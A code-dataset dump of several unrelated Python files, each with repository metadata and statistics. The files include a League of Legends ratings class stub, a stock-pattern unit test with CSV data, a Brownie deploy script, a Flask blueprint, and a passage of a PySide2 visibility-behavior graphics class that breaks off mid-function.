train/sample-cnn/sample_cnn/ops/__init__.py
|
devinplatt/ms-thesis
|
5ed05023c9929d9f068a01b2b022785678215e18
|
[
"MIT"
] | 5
|
2017-11-06T11:49:57.000Z
|
2019-08-05T14:36:35.000Z
|
train/sample-cnn/sample_cnn/ops/__init__.py
|
devinplatt/ms-thesis
|
5ed05023c9929d9f068a01b2b022785678215e18
|
[
"MIT"
] | 13
|
2017-08-03T18:28:36.000Z
|
2020-09-27T05:41:43.000Z
|
from sample_cnn.ops.batch_inputs import *
from sample_cnn.ops.evaluation import *
| 40.5
| 41
| 0.839506
| 13
| 81
| 5
| 0.615385
| 0.307692
| 0.4
| 0.492308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08642
| 81
| 2
| 42
| 40.5
| 0.878378
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
39eff40e3dc9c8757b4a7ea8468df58d4eb237dc
| 6,545
|
py
|
Python
|
loldib/getratings/models/NA/na_soraka/na_soraka_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_soraka/na_soraka_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_soraka/na_soraka_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
class NA_Soraka_Top_Aatrox(Ratings):
pass
class NA_Soraka_Top_Ahri(Ratings):
pass
class NA_Soraka_Top_Akali(Ratings):
pass
class NA_Soraka_Top_Alistar(Ratings):
pass
class NA_Soraka_Top_Amumu(Ratings):
pass
class NA_Soraka_Top_Anivia(Ratings):
pass
class NA_Soraka_Top_Annie(Ratings):
pass
class NA_Soraka_Top_Ashe(Ratings):
pass
class NA_Soraka_Top_AurelionSol(Ratings):
pass
class NA_Soraka_Top_Azir(Ratings):
pass
class NA_Soraka_Top_Bard(Ratings):
pass
class NA_Soraka_Top_Blitzcrank(Ratings):
pass
class NA_Soraka_Top_Brand(Ratings):
pass
class NA_Soraka_Top_Braum(Ratings):
pass
class NA_Soraka_Top_Caitlyn(Ratings):
pass
class NA_Soraka_Top_Camille(Ratings):
pass
class NA_Soraka_Top_Cassiopeia(Ratings):
pass
class NA_Soraka_Top_Chogath(Ratings):
pass
class NA_Soraka_Top_Corki(Ratings):
pass
class NA_Soraka_Top_Darius(Ratings):
pass
class NA_Soraka_Top_Diana(Ratings):
pass
class NA_Soraka_Top_Draven(Ratings):
pass
class NA_Soraka_Top_DrMundo(Ratings):
pass
class NA_Soraka_Top_Ekko(Ratings):
pass
class NA_Soraka_Top_Elise(Ratings):
pass
class NA_Soraka_Top_Evelynn(Ratings):
pass
class NA_Soraka_Top_Ezreal(Ratings):
pass
class NA_Soraka_Top_Fiddlesticks(Ratings):
pass
class NA_Soraka_Top_Fiora(Ratings):
pass
class NA_Soraka_Top_Fizz(Ratings):
pass
class NA_Soraka_Top_Galio(Ratings):
pass
class NA_Soraka_Top_Gangplank(Ratings):
pass
class NA_Soraka_Top_Garen(Ratings):
pass
class NA_Soraka_Top_Gnar(Ratings):
pass
class NA_Soraka_Top_Gragas(Ratings):
pass
class NA_Soraka_Top_Graves(Ratings):
pass
class NA_Soraka_Top_Hecarim(Ratings):
pass
class NA_Soraka_Top_Heimerdinger(Ratings):
pass
class NA_Soraka_Top_Illaoi(Ratings):
pass
class NA_Soraka_Top_Irelia(Ratings):
pass
class NA_Soraka_Top_Ivern(Ratings):
pass
class NA_Soraka_Top_Janna(Ratings):
pass
class NA_Soraka_Top_JarvanIV(Ratings):
pass
class NA_Soraka_Top_Jax(Ratings):
pass
class NA_Soraka_Top_Jayce(Ratings):
pass
class NA_Soraka_Top_Jhin(Ratings):
pass
class NA_Soraka_Top_Jinx(Ratings):
pass
class NA_Soraka_Top_Kalista(Ratings):
pass
class NA_Soraka_Top_Karma(Ratings):
pass
class NA_Soraka_Top_Karthus(Ratings):
pass
class NA_Soraka_Top_Kassadin(Ratings):
pass
class NA_Soraka_Top_Katarina(Ratings):
pass
class NA_Soraka_Top_Kayle(Ratings):
pass
class NA_Soraka_Top_Kayn(Ratings):
pass
class NA_Soraka_Top_Kennen(Ratings):
pass
class NA_Soraka_Top_Khazix(Ratings):
pass
class NA_Soraka_Top_Kindred(Ratings):
pass
class NA_Soraka_Top_Kled(Ratings):
pass
class NA_Soraka_Top_KogMaw(Ratings):
pass
class NA_Soraka_Top_Leblanc(Ratings):
pass
class NA_Soraka_Top_LeeSin(Ratings):
pass
class NA_Soraka_Top_Leona(Ratings):
pass
class NA_Soraka_Top_Lissandra(Ratings):
pass
class NA_Soraka_Top_Lucian(Ratings):
pass
class NA_Soraka_Top_Lulu(Ratings):
pass
class NA_Soraka_Top_Lux(Ratings):
pass
class NA_Soraka_Top_Malphite(Ratings):
pass
class NA_Soraka_Top_Malzahar(Ratings):
pass
class NA_Soraka_Top_Maokai(Ratings):
pass
class NA_Soraka_Top_MasterYi(Ratings):
pass
class NA_Soraka_Top_MissFortune(Ratings):
pass
class NA_Soraka_Top_MonkeyKing(Ratings):
pass
class NA_Soraka_Top_Mordekaiser(Ratings):
pass
class NA_Soraka_Top_Morgana(Ratings):
pass
class NA_Soraka_Top_Nami(Ratings):
pass
class NA_Soraka_Top_Nasus(Ratings):
pass
class NA_Soraka_Top_Nautilus(Ratings):
pass
class NA_Soraka_Top_Nidalee(Ratings):
pass
class NA_Soraka_Top_Nocturne(Ratings):
pass
class NA_Soraka_Top_Nunu(Ratings):
pass
class NA_Soraka_Top_Olaf(Ratings):
pass
class NA_Soraka_Top_Orianna(Ratings):
pass
class NA_Soraka_Top_Ornn(Ratings):
pass
class NA_Soraka_Top_Pantheon(Ratings):
pass
class NA_Soraka_Top_Poppy(Ratings):
pass
class NA_Soraka_Top_Quinn(Ratings):
pass
class NA_Soraka_Top_Rakan(Ratings):
pass
class NA_Soraka_Top_Rammus(Ratings):
pass
class NA_Soraka_Top_RekSai(Ratings):
pass
class NA_Soraka_Top_Renekton(Ratings):
pass
class NA_Soraka_Top_Rengar(Ratings):
pass
class NA_Soraka_Top_Riven(Ratings):
pass
class NA_Soraka_Top_Rumble(Ratings):
pass
class NA_Soraka_Top_Ryze(Ratings):
pass
class NA_Soraka_Top_Sejuani(Ratings):
pass
class NA_Soraka_Top_Shaco(Ratings):
pass
class NA_Soraka_Top_Shen(Ratings):
pass
class NA_Soraka_Top_Shyvana(Ratings):
pass
class NA_Soraka_Top_Singed(Ratings):
pass
class NA_Soraka_Top_Sion(Ratings):
pass
class NA_Soraka_Top_Sivir(Ratings):
pass
class NA_Soraka_Top_Skarner(Ratings):
pass
class NA_Soraka_Top_Sona(Ratings):
pass
class NA_Soraka_Top_Soraka(Ratings):
pass
class NA_Soraka_Top_Swain(Ratings):
pass
class NA_Soraka_Top_Syndra(Ratings):
pass
class NA_Soraka_Top_TahmKench(Ratings):
pass
class NA_Soraka_Top_Taliyah(Ratings):
pass
class NA_Soraka_Top_Talon(Ratings):
pass
class NA_Soraka_Top_Taric(Ratings):
pass
class NA_Soraka_Top_Teemo(Ratings):
pass
class NA_Soraka_Top_Thresh(Ratings):
pass
class NA_Soraka_Top_Tristana(Ratings):
pass
class NA_Soraka_Top_Trundle(Ratings):
pass
class NA_Soraka_Top_Tryndamere(Ratings):
pass
class NA_Soraka_Top_TwistedFate(Ratings):
pass
class NA_Soraka_Top_Twitch(Ratings):
pass
class NA_Soraka_Top_Udyr(Ratings):
pass
class NA_Soraka_Top_Urgot(Ratings):
pass
class NA_Soraka_Top_Varus(Ratings):
pass
class NA_Soraka_Top_Vayne(Ratings):
pass
class NA_Soraka_Top_Veigar(Ratings):
pass
class NA_Soraka_Top_Velkoz(Ratings):
pass
class NA_Soraka_Top_Vi(Ratings):
pass
class NA_Soraka_Top_Viktor(Ratings):
pass
class NA_Soraka_Top_Vladimir(Ratings):
pass
class NA_Soraka_Top_Volibear(Ratings):
pass
class NA_Soraka_Top_Warwick(Ratings):
pass
class NA_Soraka_Top_Xayah(Ratings):
pass
class NA_Soraka_Top_Xerath(Ratings):
pass
class NA_Soraka_Top_XinZhao(Ratings):
pass
class NA_Soraka_Top_Yasuo(Ratings):
pass
class NA_Soraka_Top_Yorick(Ratings):
pass
class NA_Soraka_Top_Zac(Ratings):
pass
class NA_Soraka_Top_Zed(Ratings):
pass
class NA_Soraka_Top_Ziggs(Ratings):
pass
class NA_Soraka_Top_Zilean(Ratings):
pass
class NA_Soraka_Top_Zyra(Ratings):
pass
| 15.695444
| 46
| 0.766692
| 972
| 6,545
| 4.736626
| 0.151235
| 0.209818
| 0.389661
| 0.479583
| 0.803432
| 0.803432
| 0
| 0
| 0
| 0
| 0
| 0
| 0.169748
| 6,545
| 416
| 47
| 15.733173
| 0.847258
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
84440f80b63d812cde4c461405cc11db35baa517
| 146
|
py
|
Python
|
library/python/coredump_filter/minidump2core/src/minidump2core/__init__.py
|
Microstrong0305/catboost
|
66958d683748e91c19896b84c701b2e9142f9fb2
|
[
"Apache-2.0"
] | 1
|
2021-11-04T07:13:15.000Z
|
2021-11-04T07:13:15.000Z
|
library/python/coredump_filter/minidump2core/src/minidump2core/__init__.py
|
Microstrong0305/catboost
|
66958d683748e91c19896b84c701b2e9142f9fb2
|
[
"Apache-2.0"
] | null | null | null |
library/python/coredump_filter/minidump2core/src/minidump2core/__init__.py
|
Microstrong0305/catboost
|
66958d683748e91c19896b84c701b2e9142f9fb2
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from minidump2core import print_minidump_as_core, minidump_file_to_core, minidump_text_to_core, minidump_text_to_threads
| 36.5
| 120
| 0.828767
| 22
| 146
| 4.954545
| 0.636364
| 0.330275
| 0.256881
| 0.330275
| 0.348624
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015038
| 0.089041
| 146
| 3
| 121
| 48.666667
| 0.804511
| 0.143836
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 9
|
8460956fe61999cbb5e90b55b26fc4aa415e60c8
| 158
|
py
|
Python
|
seventweets/utils.py
|
sbg/seventweets
|
a2733ff175e8be6e34f346a9a14f7f30ab24ea74
|
[
"Apache-2.0"
] | 2
|
2017-06-12T11:00:38.000Z
|
2018-06-21T07:54:38.000Z
|
seventweets/utils.py
|
sbg/seventweets
|
a2733ff175e8be6e34f346a9a14f7f30ab24ea74
|
[
"Apache-2.0"
] | null | null | null |
seventweets/utils.py
|
sbg/seventweets
|
a2733ff175e8be6e34f346a9a14f7f30ab24ea74
|
[
"Apache-2.0"
] | null | null | null |
import os
import binascii
def generate_api_token():
"""
Generates random token.
"""
return binascii.b2a_hex(os.urandom(15)).decode('ascii')
| 15.8
| 59
| 0.670886
| 20
| 158
| 5.15
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.023622
| 0.196203
| 158
| 9
| 60
| 17.555556
| 0.787402
| 0.14557
| 0
| 0
| 1
| 0
| 0.042017
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f27b14ce2bc6e7e3041986c02a463c33f7bf3e40
| 142
|
py
|
Python
|
librespot/audio/format/__init__.py
|
JeffmeisterJ/librespot-python
|
0e0e1db65aa40262bd13479b97f81ae8c29ae049
|
[
"Apache-2.0"
] | 1
|
2021-12-15T22:44:46.000Z
|
2021-12-15T22:44:46.000Z
|
librespot/audio/format/__init__.py
|
JeffmeisterJ/librespot-python
|
0e0e1db65aa40262bd13479b97f81ae8c29ae049
|
[
"Apache-2.0"
] | 12
|
2021-10-06T02:18:44.000Z
|
2022-02-07T02:16:47.000Z
|
librespot/audio/format/__init__.py
|
JeffmeisterJ/librespot-python
|
0e0e1db65aa40262bd13479b97f81ae8c29ae049
|
[
"Apache-2.0"
] | null | null | null |
from librespot.audio.format.AudioQualityPicker import AudioQualityPicker
from librespot.audio.format.SuperAudioFormat import SuperAudioFormat
| 47.333333
| 72
| 0.901408
| 14
| 142
| 9.142857
| 0.5
| 0.203125
| 0.28125
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.056338
| 142
| 2
| 73
| 71
| 0.955224
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
f28fed9e56bc8741a7d32915a9213cf59d60d84d
| 125
|
py
|
Python
|
scripts/deploy_contracts.py
|
brownie-mix/metacoin-mix
|
f8433ffd569b7c8ee5b87319158e51b2e37a0da7
|
[
"MIT"
] | null | null | null |
scripts/deploy_contracts.py
|
brownie-mix/metacoin-mix
|
f8433ffd569b7c8ee5b87319158e51b2e37a0da7
|
[
"MIT"
] | 1
|
2019-04-11T17:53:18.000Z
|
2019-04-18T13:30:52.000Z
|
scripts/deploy_contracts.py
|
brownie-mix/metacoin-mix
|
f8433ffd569b7c8ee5b87319158e51b2e37a0da7
|
[
"MIT"
] | 1
|
2019-07-11T21:28:45.000Z
|
2019-07-11T21:28:45.000Z
|
from brownie import *
def main():
ConvertLib.deploy({'from': accounts[0]})
MetaCoin.deploy({'from': accounts[0]})
| 15.625
| 44
| 0.64
| 15
| 125
| 5.333333
| 0.666667
| 0.25
| 0.45
| 0.475
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019231
| 0.168
| 125
| 7
| 45
| 17.857143
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0.064516
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f2c59923327624e91e67aa69d5ee31fd90554ebe
| 8,492
|
py
|
Python
|
tests/test_Data.py
|
nicoloridulfo/Formation-Finder
|
45725c742436266739b5723858d8fe7a3ac39667
|
[
"MIT"
] | null | null | null |
tests/test_Data.py
|
nicoloridulfo/Formation-Finder
|
45725c742436266739b5723858d8fe7a3ac39667
|
[
"MIT"
] | null | null | null |
tests/test_Data.py
|
nicoloridulfo/Formation-Finder
|
45725c742436266739b5723858d8fe7a3ac39667
|
[
"MIT"
] | 1
|
2019-08-14T12:43:37.000Z
|
2019-08-14T12:43:37.000Z
|
import numpy as np
import unittest
import pandas as pd
from io import StringIO
from FormationFinder.Data import *
StockCSV = """
Date,High,Low,Open,Close,Volume,Adj Close
2000-01-03,32.780799865722656,31.44930076599121,31.702899932861328,32.590599060058594,3285528.0,8.712677001953125
2000-01-04,32.27349853515625,31.06879997253418,32.27349853515625,31.132200241088867,7499032.0,8.322792053222656
2000-01-05,30.941999435424805,30.18120002746582,30.941999435424805,30.561599731445312,5184511.0,8.17025089263916
2000-01-06,13.638899803161621,13.638899803161621,13.638899803161621,40.91659927368164,0.0,10.93852710723877
2000-01-07,32.27349853515625,30.434799194335938,30.561599731445312,31.829700469970703,34270998.0,8.509261131286621
2000-01-10,33.35139846801758,31.576099395751953,31.576099395751953,32.590599060058594,11466146.0,8.712677001953125
2000-01-11,32.97100067138672,31.956499099731445,32.97100067138672,32.33689880371094,18261378.0,8.644850730895996
2000-01-12,32.65399932861328,31.702899932861328,31.829700469970703,32.21009826660156,6214946.0,8.610955238342285
2000-01-13,32.71739959716797,32.08330154418945,32.33689880371094,32.590599060058594,9968933.0,8.712677001953125
2000-01-14,32.97100067138672,31.89310073852539,32.71739959716797,32.71739959716797,9673455.0,8.746574401855469
2000-01-17,33.097801208496094,32.33689880371094,32.46379852294922,32.97100067138672,6870083.0,8.814370155334473
2000-01-18,33.16120147705078,32.71739959716797,33.22460174560547,32.97100067138672,6901902.0,8.814370155334473
2000-01-19,32.97100067138672,31.829700469970703,32.08330154418945,32.71739959716797,8467295.0,8.746574401855469
2000-01-20,32.844200134277344,31.702899932861328,31.702899932861328,32.33689880371094,9245403.0,8.644850730895996
2000-01-21,32.527198791503906,31.576099395751953,32.33689880371094,31.956499099731445,9230002.0,8.543159484863281
2000-01-24,32.08330154418945,31.06879997253418,32.08330154418945,31.19569969177246,5365394.0,8.339768409729004
2000-01-25,31.19569969177246,29.230100631713867,31.19569969177246,29.483699798583984,9641045.0,7.882087230682373
2000-01-26,31.06879997253418,29.61050033569336,29.80069923400879,30.434799194335938,12661921.0,8.1363525390625
2000-01-27,30.815200805664062,30.05430030822754,30.561599731445312,30.371400833129883,5863590.0,8.119404792785645
2000-01-28,30.941999435424805,29.16670036315918,30.941999435424805,29.483699798583984,4737557.0,7.882087230682373
"""
class DescriptionGenerationTest(unittest.TestCase):
def test_BullishEngulfing(self):
testData="""Open,High,Low,Close
6,7,3,4
2,9,1,8
0,0,0,16
""" #The last row of the data is to test the profit calculation
expectedResult = [-1, -1, -1, -1, 1, 1, 1, 1, -1, -1, -1, -1, 1, 1, 1, 1]
df:pd.DataFrame = pd.read_csv(StringIO(testData), sep=',', header=0)
desc, profits = generateDescription(df, 2, 1)
#Check that they are the same length
self.assertEqual(len(expectedResult), len(desc[0]))
#Check so that the elements in the lists are the same length
for i, (expected, actual) in enumerate(zip(expectedResult, desc[0])):
self.assertEqual(expected, actual, f"Elements at position {i} do not match: Expected {expected} and actual {actual}")
# Check that the profit 16 / 8 = 2
self.assertEqual(profits[0], 2)
def test_BearishHarami(self):
# For illustraction, see images/BearishHarami.jpg
testData="""Open,High,Low,Close
7,8,1,2
4,12,3,11
9,10,5,6
0,0,0,12
"""
# Manually doing the description: 1 = higher, 0 = lower -> converted to 1 and -1 respectively
# expectedResult=[1010 1010 1010 1010
# 1111 1111 0011 0011
# 0011 1111 0011 1111]
expectedResult=[1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,1,1,1,1,1,1,1,-1,-1,1,1,-1,-1,1,1,-1,-1,1,1,1,1,1,1,-1,-1,1,1,1,1,1,1]
df:pd.DataFrame = pd.read_csv(StringIO(testData), sep=',', header=0)
desc, profits = generateDescription(df, 3, 1)
#Check that they are the same length
self.assertEqual(len(expectedResult), len(desc[0]))
#Check so that the elements in the lists are the same length
for i, (expected, actual) in enumerate(zip(expectedResult, desc[0])):
self.assertEqual(expected, actual, f"Elements at position {i} do not match: Expected {expected} and actual {actual}")
# Check that the profit 12 / 6 = 2
self.assertEqual(profits[0], 2)
def test_GeneratedLength(self):
testData = """Date,High,Low,Open,Close,Volume,Adj Close
2000-01-03,32.780799865722656,31.44930076599121,31.702899932861328,32.590599060058594,3285528.0,8.712677001953125
2000-01-04,32.27349853515625,31.06879997253418,32.27349853515625,31.132200241088867,7499032.0,8.322792053222656
2000-01-05,30.941999435424805,30.18120002746582,30.941999435424805,30.561599731445312,5184511.0,8.17025089263916
2000-01-06,13.638899803161621,13.638899803161621,13.638899803161621,40.91659927368164,0.0,10.93852710723877
2000-01-07,32.27349853515625,30.434799194335938,30.561599731445312,31.829700469970703,34270998.0,8.509261131286621
2000-01-10,33.35139846801758,31.576099395751953,31.576099395751953,32.590599060058594,11466146.0,8.712677001953125
2000-01-11,32.97100067138672,31.956499099731445,32.97100067138672,32.33689880371094,18261378.0,8.644850730895996
2000-01-12,32.65399932861328,31.702899932861328,31.829700469970703,32.21009826660156,6214946.0,8.610955238342285
2000-01-13,32.71739959716797,32.08330154418945,32.33689880371094,32.590599060058594,9968933.0,8.712677001953125
2000-01-14,32.97100067138672,31.89310073852539,32.71739959716797,32.71739959716797,9673455.0,8.746574401855469
2000-01-17,33.097801208496094,32.33689880371094,32.46379852294922,32.97100067138672,6870083.0,8.814370155334473
2000-01-18,33.16120147705078,32.71739959716797,33.22460174560547,32.97100067138672,6901902.0,8.814370155334473
2000-01-19,32.97100067138672,31.829700469970703,32.08330154418945,32.71739959716797,8467295.0,8.746574401855469
2000-01-20,32.844200134277344,31.702899932861328,31.702899932861328,32.33689880371094,9245403.0,8.644850730895996
2000-01-21,32.527198791503906,31.576099395751953,32.33689880371094,31.956499099731445,9230002.0,8.543159484863281
2000-01-24,32.08330154418945,31.06879997253418,32.08330154418945,31.19569969177246,5365394.0,8.339768409729004
2000-01-25,31.19569969177246,29.230100631713867,31.19569969177246,29.483699798583984,9641045.0,7.882087230682373
2000-01-26,31.06879997253418,29.61050033569336,29.80069923400879,30.434799194335938,12661921.0,8.1363525390625
2000-01-27,30.815200805664062,30.05430030822754,30.561599731445312,30.371400833129883,5863590.0,8.119404792785645
2000-01-28,30.941999435424805,29.16670036315918,30.941999435424805,29.483699798583984,4737557.0,7.882087230682373
"""
df:pd.DataFrame = pd.read_csv(StringIO(testData), sep=',', header=0)
# Number of days = 20
# Given daysHold = 0:
# If daysBack = 2 -> removes the first day from the data. Describes and returns 19 rows.
# If daysBack = 3 -> removes the first two days from the data. Describes and returns 18 rows.
# Given daysHold = 1:
# If daysBack = 2 -> removes the first and last day from the data. Describes and returns 18 rows.
# If daysBack = 3 -> removes the first two and last one days from the data. Describes and returns 17 rows.
expected = {}
# Key = (daysBack, DaysHold)
# Value = number of rows
expected[(2, 0)] = 19
expected[(3, 0)] = 18
expected[(2, 1)] = 18
expected[(3, 1)] = 17
for daysBack, daysHold in expected:
desc, profits = generateDescription(df, daysBack, daysHold)
# Assert that the length is equal to the expected length
self.assertEqual(len(desc), expected[(daysBack, daysHold)])
| 67.936
| 137
| 0.707607
| 1,105
| 8,492
| 5.432579
| 0.195475
| 0.020656
| 0.029985
| 0.038647
| 0.8659
| 0.857904
| 0.849242
| 0.836915
| 0.803931
| 0.803931
| 0
| 0.586941
| 0.175813
| 8,492
| 124
| 138
| 68.483871
| 0.270753
| 0.131182
| 0
| 0.647727
| 0
| 0.454545
| 0.729674
| 0.626936
| 0
| 0
| 0
| 0
| 0.079545
| 1
| 0.034091
| false
| 0
| 0.056818
| 0
| 0.102273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
4b46cb26b7e487f51e592323ebeca529219ae64f
| 124
|
py
|
Python
|
webshop/myapp/bp_wishlist/__init__.py
|
grishian/groepswerk2
|
eff0305a99066466f6cafcf5572a0ea1f41f44ed
|
[
"MIT"
] | null | null | null |
webshop/myapp/bp_wishlist/__init__.py
|
grishian/groepswerk2
|
eff0305a99066466f6cafcf5572a0ea1f41f44ed
|
[
"MIT"
] | null | null | null |
webshop/myapp/bp_wishlist/__init__.py
|
grishian/groepswerk2
|
eff0305a99066466f6cafcf5572a0ea1f41f44ed
|
[
"MIT"
] | null | null | null |
from flask import Blueprint
bp_wishlist = Blueprint('bp_wishlist', __name__, cli_group="db")
from . import views_wishlist
| 20.666667
| 64
| 0.790323
| 17
| 124
| 5.294118
| 0.647059
| 0.244444
| 0.422222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.120968
| 124
| 5
| 65
| 24.8
| 0.825688
| 0
| 0
| 0
| 0
| 0
| 0.104839
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
29a7472a203512b1ed6a9091d103dd09e345ce90
| 102,353
|
py
|
Python
|
src/graphics/tguim/visibilitybehaviorgraphics.py
|
facade-technologies-inc/facile
|
4c9134dced71734641fed605e152880cd9ddefe3
|
[
"MIT"
] | 2
|
2020-09-17T20:51:18.000Z
|
2020-11-03T15:58:10.000Z
|
src/graphics/tguim/visibilitybehaviorgraphics.py
|
facade-technologies-inc/facile
|
4c9134dced71734641fed605e152880cd9ddefe3
|
[
"MIT"
] | 97
|
2020-08-26T05:07:08.000Z
|
2022-03-28T16:01:49.000Z
|
src/graphics/tguim/visibilitybehaviorgraphics.py
|
facade-technologies-inc/facile
|
4c9134dced71734641fed605e152880cd9ddefe3
|
[
"MIT"
] | null | null | null |
"""
..
/------------------------------------------------------------------------------\
| -- FACADE TECHNOLOGIES INC. CONFIDENTIAL -- |
|------------------------------------------------------------------------------|
| |
| Copyright [2019] Facade Technologies Inc. |
| All Rights Reserved. |
| |
| NOTICE: All information contained herein is, and remains the property of |
| Facade Technologies Inc. and its suppliers if any. The intellectual and |
| and technical concepts contained herein are proprietary to Facade |
| Technologies Inc. and its suppliers and may be covered by U.S. and Foreign |
| Patents, patents in process, and are protected by trade secret or copyright |
| law. Dissemination of this information or reproduction of this material is |
| strictly forbidden unless prior written permission is obtained from Facade |
| Technologies Inc. |
| |
\------------------------------------------------------------------------------/
This module contains the VBGraphics class.
"""
from copy import copy
from PySide2.QtCore import QRectF
from PySide2.QtGui import QPainterPath, QPainter, QPen, Qt, QColor, QBrush, QPainterPathStroker, QContextMenuEvent, \
QMouseEvent
from PySide2.QtWidgets import QGraphicsItem, QAbstractGraphicsShapeItem
import data.statemachine as sm
from qt_models.visibilitybehaviormenu import VisibilityBehaviorMenu
from gui.settriggeractiondialog import SetTriggerActionDialog
class VBGraphics(QAbstractGraphicsShapeItem):
MAX_LEFT_DIST = 140
MIN_LEFT_DIST = 20
ARROW_COL = QColor(230, 230, 230)
SEL_ARROW_COL = QColor(255, 200, 50)
HIDDEN_ARROW_COL = copy(ARROW_COL)
HIDDEN_ARROW_COL.setAlpha(round(ARROW_COL.alpha()/2))
def __init__(self, dataVisibilityBehavior: 'VisibilityBehavior', parent: 'TGUIMScene'):
"""
Construct the VBGraphics class.
'src' means the source component, the one triggering the vb.
'dest' means the destination component, the one receiving and affected by the vb.
:param dataVisibilityBehavior: get the data of a VisibilityBehavior
:type dataVisibilityBehavior: VisibilityBehavior
:param parent: The parent of the visibility behavior (This will always be the scene)
:type parent: TGUIMScene
:return: None
:rtype: NoneType
"""
QAbstractGraphicsShapeItem.__init__(self)
parent.addItem(self)
self._dataVB = dataVisibilityBehavior
self.setFlag(QGraphicsItem.ItemIsSelectable)
self._srcComp = self.scene().getGraphics(self._dataVB.getSrcComponent())
self._dstComp = self.scene().getGraphics(self._dataVB.getDestComponent())
self._boundingRect = None
self._path = None
self._compIsHidden = False # When path is built, if a connected component is hidden, this will be True
def onRemove():
tguim = sm.StateMachine.instance._project.getTargetGUIModel()
tguim.removeVisibilityBehavior(self._dataVB)
self.scene().removeItem(self)
sm.StateMachine.instance.view.ui.propertyEditorView.setModel(None)
def onSetTriggerAction():
dlg = SetTriggerActionDialog(self._dataVB)
dlg.exec_()
def focus():
self._zoomable = True
self.scene().views()[0].smoothFocus(self)
self.menu = VisibilityBehaviorMenu()
self.menu.onRemove(onRemove)
self.menu.onSetTrigger(onSetTriggerAction)
self.menu.onFocus(focus)
def boundingRect(self):
"""
This pure virtual function defines the outer bounds of the item as a rectangle.
:return: create the bounding of the item
:rtype: QRectF
"""
if self._boundingRect:
return self._boundingRect
srcPos = self._srcComp.scenePos()
dstPos = self._dstComp.scenePos()
leftCornerX = min(srcPos.x(), dstPos.x())
